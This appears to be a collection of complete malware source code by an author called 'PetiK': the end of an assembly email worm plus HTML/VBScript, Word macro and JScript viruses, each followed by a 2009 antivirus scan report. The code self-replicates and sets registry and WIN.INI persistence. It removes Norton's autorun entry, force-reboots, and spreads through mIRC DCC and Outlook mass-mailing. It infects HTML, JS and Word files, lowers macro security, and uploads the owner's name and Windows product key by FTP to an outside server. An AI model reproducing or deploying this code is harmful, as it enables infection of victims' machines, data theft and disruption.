db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End Sub',0dh,0ah SENDTAILLE equ $-sendd datd: db 02Ah,02Eh,076h,062h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h ,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,001h,0E6h,003h DATTAILLE equ $-datd .code DEBUT: VERIF: push push push push push push push push call push call cmp jne COPIE: call push push push call push push call push push call push push call

push offset regDisp offset regResu 00h 0F003Fh 00h 00h 00h offset CLE HKEY_CURRNET_USER RegCreateKeyExA [regResu] RegCloseKey [regDisp],1 EMAIL push 00h GetModuleHandleA 50 offset szOrig eax GetModuleFileNameA 50 offset szCopie GetWindowsDirectoryA offset Copie offset szCopie lstrcat offset szCopie offset szOrig CopyFileA

; HKCU\Software\[PetiK] exist ?

; YES => EMAIL

; Copy itself to \WINDIR\AVUpdate.exe

WIN_INI:push 50 push offset szWin call GetWindowsDirectoryA push offset Winini push offset szWin call lstrcat push offset szWin push offset szCopie push offset run push offset windows call WritePrivateProfileStringA MIRC1: push 00h push FILE_ATTRIBUTE_READONLY

; Alters the run= line in the WIN.INI ; run=\WINDIR\AVUpdate.exe

push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset mirc call CreateFileA mov [FileHandle],eax push 00h push offset octets push MIRCTAILLE push offset mircd push [FileHandle] call WriteFile push [FileHandle] call CloseHandle MIRC2: push 00h push offset script1 push offset mirc call CopyFileA push 00h push offset script2 push offset mirc call CopyFileA push 00h push offset script3 push offset mirc call CopyFileA push 00h push offset script4 push offset mirc call CopyFileA push offset mirc call DeleteFileA DEL_REG:push offset RegHandle push KEY_ALL_ACCESS push 00h push offset CLE_RUN push HKEY_LOCAL_MACHINE call RegOpenKeyExA VAL1: push value push call test jnz offset NAV [RegHandle] RegDeleteValueA eax,eax EMAIL

; Create a ini script for mIRC

; Copy to \mirc

; \mirc32

; \Program Files\mirc

; \Program Files\mirc32 ; and delete the first file

; Try to delete "Norton Auto-Protect"

; NO => jmp EMAIL

push [RegHandle] call RegCloseKey NORTON: push push push push call test jnz push push push push push push call push offset RegHandle 001F0000h 00h offset CLE_NOR HKEY_LOCAL_MACHINE RegOpenKeyExA eax,eax FIN offset BufferSize offset Buffer offset ValueType 00h offset Value RegHandle RegQueryValueExA

; Search the "InstallDir" of Norton

push [RegHandle] call RegCloseKey TRAFIC: push call push call cmp push offset filedat offset Buffer lstrcat offset Buffer GetFileAttributesA eax,FILE_ATTRIBUTE_READONLY

; Attribute read only for the file ?

je push push push push push push push call cmp je mov push push push push call push push push push push call push call push call push push call

FIN 00h FILE_ATTRIBUTE_NORMAL OPEN_EXISTING 00h FILE_SHARE_READ GENERIC_WRITE offset Buffer CreateFileA eax,-1 REBOOT [FileHandle],eax FILE_END 00h [Dist] [FileHandle] SetFilePointer 00h offset octets DATTAILLE offset datd [FileHandle] WriteFile [FileHandle] CloseHandle 5000 Sleep FILE_ATTRIBUTE_READONLY offset Buffer SetFileAttributesA

; YES => FIN

; File exist ? NO => jmp REBOOT

; End of the file

; Write datas

; Wait 5 seconds ; Attribute read only for the file

MESSAGE:push 40h push offset TITRE push offset TEXTE push 00h call MessageBoxA REBOOT: push EWX_REBOOT or EWX_FORCE call ExitWindowsEx EMAIL: push push push push push push call cmp je mov push push push push push call push call push 00h FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_HIDDEN CREATE_NEW 00h FILE_SHARE_READ GENERIC_WRITE offset VBS ; success ? continue CreateFileA eax,-1 DATE ; else, jump to label BDR [FileHandle],eax 00h offset octets SENDTAILLE offset sendd [FileHandle] WriteFile [FileHandle] CloseHandle

ENVOIE: push 01h push offset email call WinExec ATTEND: push 10000 call Sleep EFFACE: push offset VBS call DeleteFileA DATE: push call cmp jne cmp jne push offset SystemTime GetSystemTime [SystemTime.wDay],11h FIN [SystemTime.wDay],06h FIN 40h

push push push call FIN:

offset TITRE2 offset TEXTE2 00h MessageBoxA

push 00h call ExitProcess

end DEBUT

File Mustard.exe received on 05.16.2009 17:59:52 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 Result VBS.Lee.Based!IK Worm/Petik.18 Worm/Win32.Win32 W32/Malware!989a Win32:Petik-Mustard I-Worm/Petik.U Win32.Mustar.A@mm W32.Petik.D Worm.Petik.d Worm.Win32.Petik.D Win32.Petik.7168 Win32/Petik.7168.A W32/Malware!989a Email-Worm.Win32.Petik W32/PetTick.U@mm Win32.Mustar.A@mm VBS.Lee.Based Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.18 Worm:Win32/Petik.D@mm Win32/Petik.D W32/Pet_Tick.7168 W32/Petik.D Worm.Petik Medium Risk Malware Worm.Mail.Petik.y W32/Petik-D Worm.Petik W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.U Win32.Worm.Petik.8192 -

Additional information File size: 7168 bytes MD5...: 2aae09e21d35fd56f7aa0f603dcb6151 SHA1..: 4fbe3b2758bdb50ea45bb4593f074239c30bdd5d

<-Name : HTML.Embargo Author : PetiK Language : HTML/VBS ' ' ' ' ' ' ' Copy it self into %WINDIR%\WinHelp.htm Modify AUTOEXEC.BAT to display a message Modify Start Page of Internet Explorer with the WinHelp.htm file Forces FullScreen to Internet Explorer Spread with MIRC Infects all HTM and HTML file into %WINDIR%\Web\Wallpaper If day is 5th or 17th it runs "cdplayer.exe", "notepad.exe", etc...

--> <embargo> <HTML><HEAD><TITLE>WinHelp</TITLE></HEAD> <BODY bgColor=#ffffff> <SCRIPT Language=VBScript> On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set original=document.body.createTextRange Set copie=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\WinHelp.htm") copie.WriteLine "<embargo>" copie.WriteLine "<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>" copie.WriteLine "<BODY bgColor=#ffffff>" copie.WriteLine original.htmltext copie.WriteLine "</BODY></HTML>" copie.Close() reg=ws.RegRead("HKLM\Software\HTML.Embargo\") If reg <> "c parti" Then Set auto=fso.OpenTextFile("C:\autoexec.bat", 1, False, False) tout=auto.ReadAll Set nouveau= fso.CreateTextFile("C:\autoexec.bat", True, False) nouveau.Write(tout) nouveau.WriteLine "" nouveau.WriteLine "@echo off" nouveau.WriteLine ":embargo" nouveau.WriteLine "cls" nouveau.WriteLine "echo This is the signature of my new virus" nouveau.WriteLine "echo." nouveau.WriteLine "echo HTML.Embargo by PetiK" nouveau.WriteLine "echo Made In France (c)2001" nouveau.WriteLine "pause" nouveau.WriteLine "goto embargo" nouveau.Close() ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",fso.GetSpecialFolder(0)&"\WinHelp.htm" ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\FullScreen","yes" ws.RegWrite "HKLM\Software\HTML.Embargo\","c parti" End If reg=ws.RegRead("HKLM\Software\HTML.Embargo\mirc") If reg <> "c parti" Then PFD=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") If dossier = "" Then If fso.FileExists("c:\mirc\mirc.ini") Then dossier = "c:\mirc" If fso.FileExists("c:\mirc32\mirc.ini") Then dossier = "c:\mirc32" If fso.FileExists(PFD & "\mirc\mirc.ini") Then dossier = PFD & "\mirc" If fso.FileExists(PFD & "\mirc32\mirc.ini") Then dossier = PFD & "\mirc32" End If If dossier <> "" Then Set script = fso.CreateTextFile(dossier & "\script.ini", True) script.WriteLine "[script]" script.WriteLine "n0=on 1:JOIN:#:{" script.WriteLine "n1= /if ( $nick == &me ) (halt)" script.WriteLine "n2= ./dcc send $nick " & fso.GetSpecialFolder(0)&"\WinHelp.htm" script.WriteLine "n3=}" ws.RegWrite "HKLM\Software\HTML.Embargo\mirc","c parti" End If Set FolderObj = fso.GetFolder(fso.GetSpecialFolder(0)&"\WEB\WallPaper") Set FO = FolderObj.Files For Each cible in FO

ext = lcase(fso.GetExtensionName(cible.Name)) If ext = "htm" or ext = "html" Then Set vrai = fso.OpenTextFile(cible.path, 1, false) If vrai.readline <> "<embargo>" Then vrai.Close() Set vrai = fso.OpenTextFile(cible.path, 1, false) htmorg = vrai.ReadAll() vrai.Close() Set virus = document.body.createTextRange Set vrai = fso.CreateTextFile(cible.path, True, False) vrai.WriteLine(htmorg) vrai.WriteLine "" vrai.WriteLine virus.htmltext vrai.Close() Else vrai.Close() End If End If Next End If If Day(Now()) = 5 or Day(Now)) = 17 Then ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CDPlayer",fso.GetSpecialFolder(0)&"\C dplayer.exe" ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NotePad",fso.GetSpecialFolder(0)&"\No tepad.exe" ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PaintBrush",fso.GetSpecialFolder(0)&" \Pbrush.exe" ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer",fso.GetSpecialFolder(0)&"\E xplorer.exe" ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\RegEdit",fso.GetSpecialFolder(0)&"\Re gedit.exe" ws.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut","60" ws.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveUsePassword", 01, "REG_DWORD" document.Write "<font face='verdana' color=blue size='2'>Microsoft Internet Explorer<br>Please enabled ActiveX to see this page<br></font>" </SCRIPT> </BODY></HTML>

File Embargo.htm received on 05.16.2009 11:30:48 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result VBS.Embargo!IK HTML/Petik Worm/Petik.J Worm/Win32.Petik VBS/Embargo.A BV:KillAll VBS/Bother VBS.Embargo.A VBS.Petik.J Unclassified Malware VBS.Generic.262 Email-Win32.Petik.j VBS/Both VBS/Embargo.A Email-Worm.Win32.Petik.j VBS/Petik.J!worm VBS.Embargo.A VBS.Embargo Email-Worm.Win32.Petik.j VBS/Ergo.intd VBS/Ergo.intd Worm.Petik.J Virus:VBS/Petik.J VBS/Petik.J mIRC/Gen_HTM VBS.Embargo.A HTML/Embargo VBS.Embargo.A VBS.Petik.j VBS/Ergo-A VBS.Embaro.A.Intd Email-Worm.Win32.Petik.j VBS.Embargo.A

Additional information File size: 4085 bytes MD5...: 4ec0004fb7f700df736ae4d3c2c22919 SHA1..: 464dec7db3865638af142f5e8929fcd49e5af667

' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '

Worm Name : W97M.Maya.A Author : PetiK Language : VBA Word Date : May 29th – June 1st 2001 Size : 33792 – 33280 (with change) bytes

Change the properties of the documents. If not exist the Value “W97M.Maya” in the key HKLM\Software\, the worm copy itself to C:\Windows\Maya.doc. It creates the “C:\Maya” directory with a TXT file and a acript file to infect mIRC channel. After, it spreads with Microsoft Outlook. Subject : “Hi man, it’s ” + user name Body : “This is the new net Story” “It ‘s great” Attachment : Maya.doc On 5th of the month, when the document is close, a message box appears. When Visual Basic is active, an other message box appears and the worm add a value in the “RunKey” of regedit to disabled the mouse.

Sub AutoOpen() On Error Resume Next With Dialogs(wdDialogFileSummaryInfo) .Author = "PetiK" .Title = "W97M.Maya" .Comments = "To my best GirlFriend" .Keywords = "Maya, Bzzbzz, to grow" .Execute End With If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") <> "Par PetiK" Then ActiveDocument.SaveAs FileName:="C:\Windows\Maya.doc" ActiveDocument.Saved = True FileSystem.MkDir "C:\Maya" Open "C:\Maya\hello.txt" For Output As #1 Print #1, "Le 29 mai 2001 à Munster" Print #1, "This is my first W97M.Outlook.Worm" Print #1, "Its name is W97M.Maya" Close #1 Open "C:\Maya\script.ini" For Output As #1 Print #1, "n0=on 1:JOIN:#:{" Print #1, "n1= /if ( $nick == $me ) { halt }" Print #1, "n2= /.dcc send $nick C:\Windows\Maya.doc" Print #1, "n3=}" Close #1 FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc\script.ini" FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc32\script.ini" FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc\script.ini" FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc32\script.ini" FileSystem.Kill "C:\Maya\script.ini" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") = "Par PetiK" End If Dim maya, bzzbzz, petik Set maya = CreateObject("Outlook.Application") Set bzzbzz = maya.GetNameSpace("MAPI") If maya = "Outlook" Then bzzbzz.Logon "profile", "password" For mayacompte = 1 To bzzbzz.AddressLists.Count Set AB = bzzbzz.AddressLists(mayacompte) x = 1 Set petik = maya.CreateItem(0) For compte = 1 To AB.AddressEntries.Count verif = AB.AddressEntries(x) petik.Recipients.Add verif x = x + 1 If x > 500 Then compte = AB.AddressEntries.Count Next compte petik.Subject = "Hi man, it's " & Application.UserName petik.Body = "This is the new net Story" + vbCrLf + "It's great" petik.Attachments.Add ActiveDocument.FullName

petik.DeleteAfterSubmit = True petik.Send verif = "" Next mayacompte bzzbzz.Logoff End If End Sub Sub AutoClose() If Day(Now) = 5 Then MsgBox "Coded by PetiK (c)2001", vbInformation, "W97M.Maya" End If End Sub Sub ViewVBCode() System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MayAttack") = "rundll32 mouse,disable" MsgBox "Curiosity is bad" + vbCr + vbCr + "With her small size" + vbCr + "Maya is alwayas there", vbCritical, "W97M.Maya" ShowVisualBasicEditor = True End Sub

File Maya.doc received Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

on 05.16.2009 17:59:46 (CET) Version Last Update 4.0.0.101 2009.05.16 5.0.0.2 2009.05.16 7.9.0.168 2009.05.15 2.0.3.1 2009.05.15 5.1.2.4 2009.05.16 4.8.1335.0 2009.05.15 8.5.0.336 2009.05.15 7.2 2009.05.16 10.00 2009.05.15 0.94.1 2009.05.16 1157 2009.05.08 5.0.0.12182 2009.05.16 7.0.17.0 2009.05.14 31.6.6508 2009.05.16 4.4.4.56 2009.05.16 8.0.14470.0 2009.05.15 3.117.0.0 2009.05.16 19 2009.05.16 T3.1.1.49.0 2009.05.16 7.10.737 2009.05.16 7.0.0.125 2009.05.16 5616 2009.05.15 5616 2009.05.15 6.7.6 2009.05.15 1.4602 2009.05.16 4080 2009.05.15 6.01.05 2009.05.16 2009.1.8.0 2009.05.16 10.0.0.14 2009.05.16 4.4.2.0 2009.05.16 3.0 2009.05.16 21.29.52.00 2009.05.16 4.41.0 2009.05.16 3.2.1858.2 2009.05.16 1.4.4.12 2009.05.16 6.3.4.1.326 2009.05.15 8.950.0.1092 2009.05.15 3.12.10.5 2009.05.16 2009.5.15.1737 2009.05.15 4.6.5.0 2009.05.16

Result Virus.MSWord.Melissa-based!IK W97M/Unnamed W2000M/Ayam.A@mm Virus/MSWord.MSWord W97M/Ayam.A@mm MW97:Ayam family BAT/Generic W97M.Ayam.A@mm W97M.Prilissa W97M.Ayam.A Virus.MSWord.Melissabased X97M.Papa O97M.GNsm W97M/Ayam.A:mm W97M/Ayam.A@mm Virus.MSWord.Melissa-based W97M/Ayam.A@MM W97M.Ayam.A@mm Virus.MSWord.Melissa-based Macro.Melissa-based Virus.MSWord.Melissa-based W97M/Generic@MM W97M/Generic@MM Macro.Ayam.A Virus:W97M/Ayam.A@mm W97M/Ayam.A W97M/Ayam.A W97M.Ayam.A@mm W97M/Maya.Worm WORD.97.Maya.B Macro.Office.Melissa-based.aa WM97/Munster-A Virus.MSWord.Melissa-based (v) W97M.OutlookWorm.Gen W2KM/Sin W97M_AYAM.A Virus.X97M.Papa W97M.Ayam.A WORD.97.Maya.B

Additional information File size: 33280 bytes MD5...: ebe499343061e49ea4f31639fc3a7e59 SHA1..: 89de7abdbdc3fc8764d481a49125b8a3cebf6f05

// // // // // // // //

Name : JS.Germinal.A@mm Author : PetiK Date : June 1st – 2nd 2001 Language : JScript Size of infection : 2357 bytes Action : It infects all *.JS file in \WINDOWS, \WINDOWS\DESKTOP and \WINDOWS\SAMPLES\WSH folders. It creates a TXT file with information and send this to a ftp server.

// JS.Germinal.A@mm var WS=WScript.CreateObject("WScript.Shell") var fso=WScript.CreateObject("Scripting.FileSystemObject") var win=fso.GetSpecialFolder(0) var c=fso.OpenTextFile(WScript.ScriptFullName,1) var virus=c.ReadAll() var dossier=new Array() dossier[0]=fso.GetFolder(".") dossier[1]=win dossier[2]=win + "\\Desktop" dossier[3]=win + "\\SAMPLES\\WSH" for(i=0;i<4;i++){ infecte(dossier[i]) } function infecte(dossier) { var notredossier=fso.GetFolder(dossier) var fichier=new Enumerator(notredossier.Files) if(fso.GetExtensionName(fichier.item()).toUpperCase()=="JS") { var victime=fso.OpenTextFile(fichier.item().path,1) var marque=victime.Read(19) var victimecode=marque+victime.ReadAll() victime.Close() if(marque!="// JS.Germinal.A@mm") { var victime=fso.CreateTextFile(fichier.item().path,2) victime.Write(virus+victimecode) victime.Close() } } } WS.RegWrite ("HKLM\\Software\\","JS.Germinal Par PetiK 02/05/2001"); WS.RegWrite ("HKCU\\Software\\","JS.Germinal Par PetiK 02/05/2001"); var nom=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOwner") var org=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOrganization") var id=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductId") var key=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductKey") var ver=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Version") var vernum=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\VersionNumber") var txt=fso.CreateTextFile("C:\\"+nom+".txt",2) txt.WriteLine ("Information de " + nom + " à " + org); txt.WriteLine (""); txt.WriteLine ("Numéro d'identification : " + id); txt.WriteLine ("Numéro de la clé : " + key); txt.WriteLine ("Version de windows : " + ver + " " + vernum); txt.Close() var drv=fso.CreateTextFile(win+"\\PetiK.drv",2) drv.WriteLine ("open"); drv.WriteLine ("members.aol.com"); drv.WriteLine ("pentasm99"); drv.WriteLine ("ascii") drv.WriteLine ("put C:\\"+nom+".txt"); drv.WriteLine ("bye"); drv.WriteLine ("exit"); drv.Close() WS.Run ("command.com /c ftp.exe -i -v -s:"+win+"\\PetiK.drv") // Par PetiK 2nd June 2001

File Germinal.js received on 05.16.2009 11:58:21 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Virus.JS.Germinal!IK JS/Germinal JSC/Germinal.1 Virus/JS.JS JS/Germinal.A Unix:Malware-gen JS.Germinal.A JS_/Germinal JS.Germinal JS.Optiz JS/Germin JS/Germinal.A Virus.JS.Germinal JS/GERMINAL.A JS.Germinal.A Virus.JS.Germinal Virus.JS.Germinal JS/Germinal JS/Germinal Script.Germinal.1 Trojan:JS/Germinal.A JS/Germinal.A JS/Germinal.B JS.Germinal.A JS.Germinal.A Script.Germinal.Trojan JS/Germinal Virus.JS.Germinal (v) JS.Lamnireg.A.Trojan JS_GERMINAL.A Virus.JS.Germinal JS.Germinal.A

Additional information File size: 2357 bytes MD5...: b90254895d6169a8d111a508e2638c51 SHA1..: 7669c66d338b4208536c32924bcab95996cf8c3e

' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '

Name : W97M.Kodak Author : PetiK Date : June 5th 2001 Size 3,030 bytes Macro AutoOpen : Create a “script.ini” file for mIRC. If the day is the 5th the virus display a Baloon Message. It copies itself to /Windows/Kodak.doc. Macro AutoClose : It alters the security in Word 9.0 and 10.0 (2000 and XP) It copies his code into the file “Kodak.vxd” and put it in the “NORMAL.DOT”. When a new file is create, the code of the macro is writes in this file. To avoid infect two times “NORMAL.DOT”, the virus adds the value : HKEY_LOCAL_MACHINE\Software\Microsoft\W97M.Kodak = CliClac Macro HelpAbout : Display an other Baloon Message Macro ViewVBCode : Display a Message Box and shoxs Visual Basic Editor Macro ToolsOptions and Security : Find yourself.

'W97M.Kodak by PetiK 05/10/2001 Sub AutoOpen() On Error Resume Next ActiveDocument.SaveAs FileName:="C:\Windows\Kodak.doc" ActiveDocument.Saved = True Open "C:\script.drv" For Output As #1 Print #1, "n0=on 1:JOIN:#:{" Print #1, "n1= /if ( $nick == $me ) { halt }" Print #1, "n2= /.dcc send $nick C:\Windows\Kodak.doc" Print #1, "n3=}" Close #1 FileSystem.FileCopy "C:\script.drv", "C:\mirc\script.ini" FileSystem.FileCopy "C:\script.drv", "C:\mirc32\script.ini" FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc\script.ini" FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc32\script.ini" FileSystem.Kill "C:\script.drv" If Day(Now) = 5 Then With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "I am always here. And you, are you here." .Heading = "W97M.Kodak" .Animation = msoAnimationGetAttentionMajor .Button = msoButtonSetOK .Show End With End If End Sub Sub AutoClose() If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> 1& Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End If If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> 1& Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& End If If Dir("C:\Kodak.vxd", vbReadOnly) = "" Then Open "C:\Kodak.vxd" For Output As #1 For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines K = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1) Print #1, K Next i Close #1 SetAttr "C:\Kodak.vxd", vbReadOnly End If If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") <> "ClicClac" Then NormalTemplate.VBProject.VBComponents.Import "C:\Kodak.vxd" NormalTemplate.Save System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") = "ClicClac" End If

ActiveDocument.VBProject.VBComponents.Import "C:\Kodak.vxd" ActiveDocument.Save End Sub Sub HelpAbout() With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "Smile and cheese for the photo" .Heading = "W97M.Kodak" .Animation = msoAnimationGetAttentionMajor .Button = msoButtonSetOK .Show End With End Sub Sub ViewVBCode() MsgBox "was coded by PetiK(c)2001", vbInformation, "W97M.Kodak" ShowVisualBasicEditor = True End Sub Sub ToolsOptions() On Error Resume Next Options.VirusProtection = 1 Options.SaveNormalPrompt = 1 Dialogs(wdDialogToolsOptions).Show Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 End Sub Sub ToolsSecurity() On Error Resume Next CommandBars("Macro").Controls("Security...").Enabled = True Dialogs(wdDialogToolsSecurity).Show CommandBars("Macro").Controls("Security...").Enabled = False End Sub

